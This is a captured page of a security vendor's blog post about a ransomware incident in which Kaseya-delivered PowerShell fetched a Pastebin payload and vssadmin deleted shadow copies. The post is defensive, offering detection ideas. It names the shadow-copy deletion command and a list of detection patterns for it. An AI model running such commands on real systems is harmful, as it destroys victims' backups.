redcanary.com
Open in
urlscan Pro
104.198.136.223
Public Scan
URL:
https://redcanary.com/blog/its-all-fun-and-games-until-ransomware-deletes-the-shadow-copies/
Submission: On May 09 via api from US — Scanned from DE
Submission: On May 09 via api from US — Scanned from DE
Form analysis 3 forms found in the DOM
<form id="mktoForm_1034" novalidate="novalidate" class="mktoForm mktoHasWidth mktoLayoutLeft" style="font-family: inherit; font-size: 13px; color: rgb(51, 51, 51); width: 997px;" __bizdiag="1302408230" __biza="WJ__">
<style type="text/css"></style>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 5px;">
<div class="mktoOffset" style="width: 5px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="FirstName" id="LblFirstName" class="mktoLabel mktoHasWidth" style="width: 146px;">
<div class="mktoAsterix">*</div>First Name:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 5px;"></div><input id="FirstName" name="FirstName" placeholder="First Name" maxlength="255" aria-labelledby="LblFirstName InstructFirstName" type="text"
class="mktoField mktoTextField mktoHasWidth mktoRequired" aria-required="true" style="width: 342px;"><span id="InstructFirstName" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 5px;">
<div class="mktoOffset" style="width: 5px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="LastName" id="LblLastName" class="mktoLabel mktoHasWidth" style="width: 146px;">
<div class="mktoAsterix">*</div>Last Name:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 5px;"></div><input id="LastName" name="LastName" placeholder="Last Name" maxlength="255" aria-labelledby="LblLastName InstructLastName" type="text"
class="mktoField mktoTextField mktoHasWidth mktoRequired" aria-required="true" style="width: 342px;"><span id="InstructLastName" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 5px;">
<div class="mktoOffset" style="width: 5px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="Email" id="LblEmail" class="mktoLabel mktoHasWidth" style="width: 146px;">
<div class="mktoAsterix">*</div>Email Address:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 5px;"></div><input id="Email" name="Email" placeholder="Email Address" maxlength="255" aria-labelledby="LblEmail InstructEmail" type="email"
class="mktoField mktoEmailField mktoHasWidth mktoRequired" aria-required="true" style="width: 342px;"><span id="InstructEmail" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="GCLID__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Company_Country__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Company_Industry__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Company_Location_Type__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Company_Name__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Company_Phone__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Company_Revenue_Range__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Company_Size_Exact__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Company_State__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Company_Website__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Company_Zipcode__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Confidence_Description__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Confidence_Level__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Enrichment_Status__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Matching_Confidence_Level__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Person_Department__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Person_Email__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Person_First_Name__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Person_Last_Name__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Person_Level__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Person_Original_Email_Verification__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Person_Phone__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Person_Title__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Person_Verification_Source__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Person_Verification_Status__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="lSSystemStatus" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="lSUpdated" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LS_Company_Size_Range__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoButtonRow"><span class="mktoButtonWrap mktoNative" style="margin-left: 110px;"><button type="submit" class="mktoButton">Subscribe</button></span></div><input type="hidden" name="formid" class="mktoField mktoFieldDescriptor"
value="1034"><input type="hidden" name="munchkinId" class="mktoField mktoFieldDescriptor" value="003-YRU-314"><input type="hidden" name="mktoUTMSource" class="mktoField mktoFieldDescriptor" value=""><input type="hidden" name="mktoUTMMedium"
class="mktoField mktoFieldDescriptor" value=""><input type="hidden" name="mktoUTMCampaign" class="mktoField mktoFieldDescriptor" value="">
</form>GET https://redcanary.com/
<form method="get" class="search-form" action="https://redcanary.com/" __bizdiag="115" __biza="WJ__"> <svg width="20" height="19" viewBox="0 0 20 19" fill="none" xmlns="http://www.w3.org/2000/svg">
<line x1="12.8839" y1="12.1161" x2="18.8839" y2="18.1161" stroke="black" stroke-width="2.5"></line>
<circle cx="7.5" cy="7.5" r="6.25" stroke="black" stroke-width="2.5"></circle>
</svg> <input id="input-search" class="search-input" name="s" type="text" placeholder="Search" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"> <input type="submit" class="search-btn" value="Search"></form><form novalidate="novalidate" class="mktoForm mktoHasWidth mktoLayoutLeft" style="font-family: inherit; font-size: 13px; color: rgb(51, 51, 51); visibility: hidden; position: absolute; top: -500px; left: -1000px; width: 1600px;"
__bizdiag="1045523891" __biza="WJ__"></form>Text Content
Skip Navigation
Improve cybersecurity preparedness with our NEW Readiness Exercises platform
LEARN MORE
Get a Demo
Demo
* Products & Solutions
* Resources
* Partners
* Why Red Canary
* Company
* 2022 Threat Detection Report PDF
* 2022 Executive Summary PDF
* Intro
* Past Reports
* Threats
* Techniques
* Introduction
* Ransomware
* Supply Chain Compromises
* Vulnerabilities
* Affiliates
* Crypters-as-a-Service
* Common Webshells
* User-Initiated Initial Access
* Malicious macOS Installers
* Remote Monitoring and Management Abuse
* Linux Coinminers
* Abusing Remote Procedure Calls
* Defense Validation and Testing
* Top Threats
* Rose Flamingo
* Silver Sparrow
* Bazar
* Latent Threats
* Cobalt Strike
* Impacket
* SocGholish
* Yellow Cockatoo
* Gootkit
* BloodHound
* Top Techniques
* Command and Scripting Interpreter
* Signed Binary Proxy Execution
* Windows Management Instrumentation
* OS Credential Dumping
* Ingress Tool Transfer
* Process Injection
* Scheduled Task/Job
* Obfuscated Files or Information
* Masquerading
* Hijack Execution Flow
* Impair Defenses
* Managed Detection and Response
* Integrations
* The Red Canary Difference
* Get a Demo
Named a leader in MDR
PRODUCTS
* Managed Detection and ResponseProtect your users, endpoints, and cloud
* Readiness ExercisesTraining, tabletops, and atomic tests in an engaging
learning platform
* Linux EDRProtect production Linux endpoints that can never go down
* Atomic Red Team™ [open source]Easily simulate adversary techniques to test
your controls
SOLUTIONS
* Get a 24x7 SOC instantly
* Protect your corporate endpoints and network
* Protect your users’ email, identities, and SaaS apps
* Protect your cloud
* Protect critical production Linux and Kubernetes
* Stop business email compromise
* Replace your MSSP or existing MDR
* Run more effective tabletops
* Train continuously for real world situations
* Operationalize your Microsoft security stack
* Test your defenses
* Minimize downtime with after-hours support
* View All Resources
* Blog
* Guides & Overviews
* Case Studies
* Videos
* Webinars
* Events
* Customer Help Center
Blog
Sharpen your skills with the latest information, security articles, and
insights.
* Overview
* Incident Response
* Insurance & Risk
* Managed Service Providers
* Solution Providers
* Technology Partners
Red Canary Partner Connect
Apply to become a partner.
* About Us
* News & Press
* Careers - We're Hiring!
* Contact Us
* Trust Center and Security
Contact Us
How can we help you? Reach out to our team and we'll get in touch.
* Liner Notes
* Side 1: Trends
* Side 2: Threats
* Bonus Tracks: Techniques
* Products
& Solutions
Products & Solutions
* Managed Detection and Response
* Readiness Exercises
* Linux EDR
* Atomic Red Team™ [open source]
* Get a 24x7 SOC instantly
* Protect your corporate endpoints and network
* Protect your users’ email, identities, and SaaS apps
* Protect your cloud
* Protect critical production Linux and Kubernetes
* Stop business email compromise
* Replace your MSSP or existing MDR
* Operationalize your Microsoft security stack
* Run more effective tabletops
* Train continuously for real world situations
* Test your defenses
* Minimize downtime with after-hours support
* Resources
Resources
* View All Resources
* Blog
* Guides & Overviews
* Case Studies
* Videos
* Webinars
* Events
* Customer Help Center
* Partners
Partners
* Overview
* Incident Response
* Insurance & Risk
* Managed Service Providers
* Solution Providers
* Technology Partners
* Apply to Become a Partner
* Why Red Canary
Why Red Canary
* Managed Detection and Response
* Integrations
* The Red Canary Difference
* Get a Demo
* Company
Company
* About Us
* News & Press
* Careers - We're Hiring!
* Contact Us
* Trust Center and Security
Share
RESOURCES • BLOG THREAT DETECTION
IT’S ALL FUN AND GAMES UNTIL RANSOMWARE DELETES THE SHADOW COPIES
Adversaries reliably use the Vssadmin Windows process to delete backup files
during ransomware infections.
TONY LAMBERT• BRIAN DONOHUE•
Originally published August 21, 2019. Last modified June 7, 2022.
Security is too frequently described in terms of wins and losses. When your
freshly tuned email filter blocks a phishing email, it’s a win; when an employee
downloads a malicious attachment, it’s a loss. Of course, as is nearly always
the case, it’s more complicated than that. Not everything is binary, and there
are degrees of good and bad.
For example, it’s not good when an adversary manages to delete the backup files
on one of your endpoints. However, it’s decidedly bad if that adversary manages
to encrypt all of the files on that same endpoint and worse still if the
infection spreads to hundreds of other machines on the network.
We detected an adversary deleting Windows Volume Shadow Copy Service (VSS) files
on a handful of endpoints a few weeks back. This detection kept a bad situation
from getting worse and scored our customer a win from the midst of a losing
situation.
In the following paragraphs, we hope to offer guidance for how you can stop
ransomware infections before they get totally out of hand.
TL;DR
A malicious batch (.bat) file executed a PowerShell command that downloaded and
executed a remotely hosted payload on Pastebin to deploy ransomware.
Additionally, it launched the Volume Shadow Service Administration Tool
(vssadmin.exe) to remove local shadow copies.
THE FULL STORY
Our detection begins with Kaseya, an IT client management tool that wrote a
batch script to disk and executed it on one of the endpoints we monitor. In
general, IT support and help desk teams use Kaseya to remotely deploy software
across an organization or on specific endpoints. Under normal conditions, you’d
expect to see Kaseya spawning known binaries associated with legitimate
software.
However, it can also be a powerful tool in the hands of an adversary seeking to
install malware or other malicious tooling in a host environment. In fact, this
is such a common approach among adversaries that MITRE has an ATT&CK technique
for it: Application Deployment Software (T1017). This is precisely what we can
see happening in the following image.
As a sidebar, it’s worth pointing out that adversaries have leveraged a number
of compromised Kaseya accounts to deliver ransomware in the past, according to
reporting from BleepingComputer. We’ve seen similar instances where Kaseya has
been compromised and used to deploy cryptocurrency miners.
A WILD POWERSHELL EMERGES
In this instance, however, we see PowerShell executing with a variety of
Base64-encoded commands. Upon decoding these, we see a network connection going
out to Pastebin to download and execute a follow-on command.
WHEN THE SHADOW COPIES DISAPPEAR
The command line associated with the script from Pastebin showed that it was
instructing vssadmin.exe to delete shadow copies, a behavior that very often
occurs in tandem with ransomware infections.
WHAT’S A VSSADMIN, ANYWAY? AND WHAT IS A SHADOW COPY?
Vssadmin is a default Windows process that manipulates volume shadow copies of
the files on a given computer. These shadow copies are often used as backups,
and they can be used to restore or revert files back to a previous state if they
are corrupted or lost for some reason. Vssadmin is commonly used by backup
utilities and systems administrators.
As such, the people responsible for ransomware campaigns often attempt to delete
them so that their victims can’t restore file access by reverting to the shadow
copies. As a note, interacting with vssadmin should require administrative
privileges.
DETECTION VIA VSSADMIN
The command line parameter—vssadmin.exe Delete Shadows—offers us a great
opportunity to detect ransomware. In fact, this detector has helped us uncover
496 confirmed threats since we created it. Beyond this strain of malware,
looking for vssadmin manipulation is a reliable method for identifying other
ransomware like Robbinhood and more sophisticated threats like Ryuk. In fact,
this is so common that MITRE has included it as a technique in ATT&CK: Inhibit
System Recovery (T1490).
TESTING YOUR ABILITY TO DETECT THIS TECHNIQUE
If you want to test the detection of this technique in your environment, there
are Atomic Red Team tests that will help you do just that!
OPPORTUNITIES FOR DETECTION
The deletion of shadow copies is suspicious enough on its own that we don’t
really need to inquire any further. However, we always strive for
defense-in-depth, and it’s always preferable for the events we analyze to have
more than one detector associated with them—just in case the adversary develops
some method for circumventing a specific detector. Of course, there are other
ways to remove shadow copies via PowerShell or WMI as well.
Other detection opportunities here—with varying levels of fidelity—include:
* PowerShell downloading remotely hosted files
* PowerShell using the encoded command flag
* PowerShell making a network connection to an external paste-site
* PowerShell containing a URL in its command line
* Wmic.exe with command line shadowcopy delete
* PowerShell with command line win32_shadowcopy
* Vssadmin.exe with command line resize shadowstorage
Beyond these, we can see the Pastebin URL in question, and there isn’t much risk
in going directly to Pastebin and examining the payload there. At first glance,
the filename itself is somewhat suspicious, although that is an admittedly
unreliable indicator of malice.
What’s more telling is the inclusion of function names that correspond with a
PowerShell payload called Invoke-ReflectivePEInjection, which lets an attacker
inject a dynamic link library (DLL) directly into PowerShell. Further, at the
bottom of the page, you can see a long block of apparent nonsense that, when
base64 decoded, reveals the actual ransomware binary. When we checked that
binary in VirusTotal, we learned it had been previously associated with a known
malware strain called Sodinokibi. This family, along with a few others, have
rushed to take advantage of a post-Gandcrab era to make loads of money from
ransoming files.
CONCLUSION
Having the capacity to detect when an adversary interacts with vssadmin will
provide a reliable method for detecting a wide variety of ransomware. As we
explained above, you’ll certainly want more robust detection in the off-chance
that an adversary devises a method for circumventing this.
However, at a higher level, if you have the necessary visibility required to
observe interactions with vssadmin, then you will also have the visibility
required to build detection for vast quantities of other threats that
materialize in process metadata and other endpoint telemetry.
RELATED ARTICLES
Introducing: Red Canary Mac Monitor
* Threat detection
INTRODUCING: RED CANARY MAC MONITOR
Threat Detection Series: Watch the PowerShell power hour
* Threat detection
THREAT DETECTION SERIES: WATCH THE POWERSHELL POWER HOUR
Live from New York, it’s Threat Detection Series Live!
* Threat detection
LIVE FROM NEW YORK, IT’S THREAT DETECTION SERIES LIVE!
A guided tour of the 2023 Threat Detection Report
* Threat detection
A GUIDED TOUR OF THE 2023 THREAT DETECTION REPORT
SUBSCRIBE TO OUR BLOG
You'll receive a weekly email with our new blog posts.
*
First Name:
*
Last Name:
*
Email Address:
Subscribe
SEE WHAT IT'S LIKE TO HAVE A SECURITY ALLY.
EXPERIENCE THE DIFFERENCE BETWEEN A SENSE OF SECURITY AND ACTUAL SECURITY.
Get a Demo
*
*
*
* Products & Solutions
* Atomic Red Team™
* MDR Everywhere
* MDR for Microsoft
* Active Remediation
* Replace your MSSP
* Post-Breach Response
* EDR Deployment
* EDR Migration
* Linux Security
* Alert Triage
* Mac Monitor
* Resources
* View all Resources
* Blog
* Guides & Overviews
* Case Studies
* Videos
* Webinars
* Events
* Customer Help Center
* Newsletter
* Partners
* Overview
* Incident Response
* Insurance & Risk
* Managed Service Providers
* Solution Providers
* Technology Partners
* Apply to Become a Partner
* Why Red Canary?
* Managed Detection and Response
* Integrations
* The Red Canary Difference
* Get a Demo
* Company
* About Us
* News & Press
* Careers – We’re Hiring!
* Contact Us
* Trust Center and Security
© 2014-2023 Red Canary. All rights reserved. info@redcanary.com +1 855-977-0686
Privacy Policy Trust Center and Security
Our website uses cookies to provide you with a better browsing experience. More
information can be found in our Privacy Policy.
OK
Privacy & Cookies Policy
Close
PRIVACY OVERVIEW
This website uses cookies to improve your experience while you navigate through
the website. Out of these cookies, the cookies that are categorized as necessary
are stored on your browser as they are essential for the working of basic
functionalities...
Necessary
Necessary
Always Enabled
Necessary cookies are absolutely essential for the website to function properly.
This category only includes cookies that ensures basic functionalities and
security features of the website. These cookies do not store any personal
information.
Non-necessary
Non-necessary
Any cookies that may not be particularly necessary for the website to function
and is used specifically to collect user personal data via analytics, ads, other
embedded contents are termed as non-necessary cookies. It is mandatory to
procure user consent prior to running these cookies on your website.
SAVE & ACCEPT
Back to Top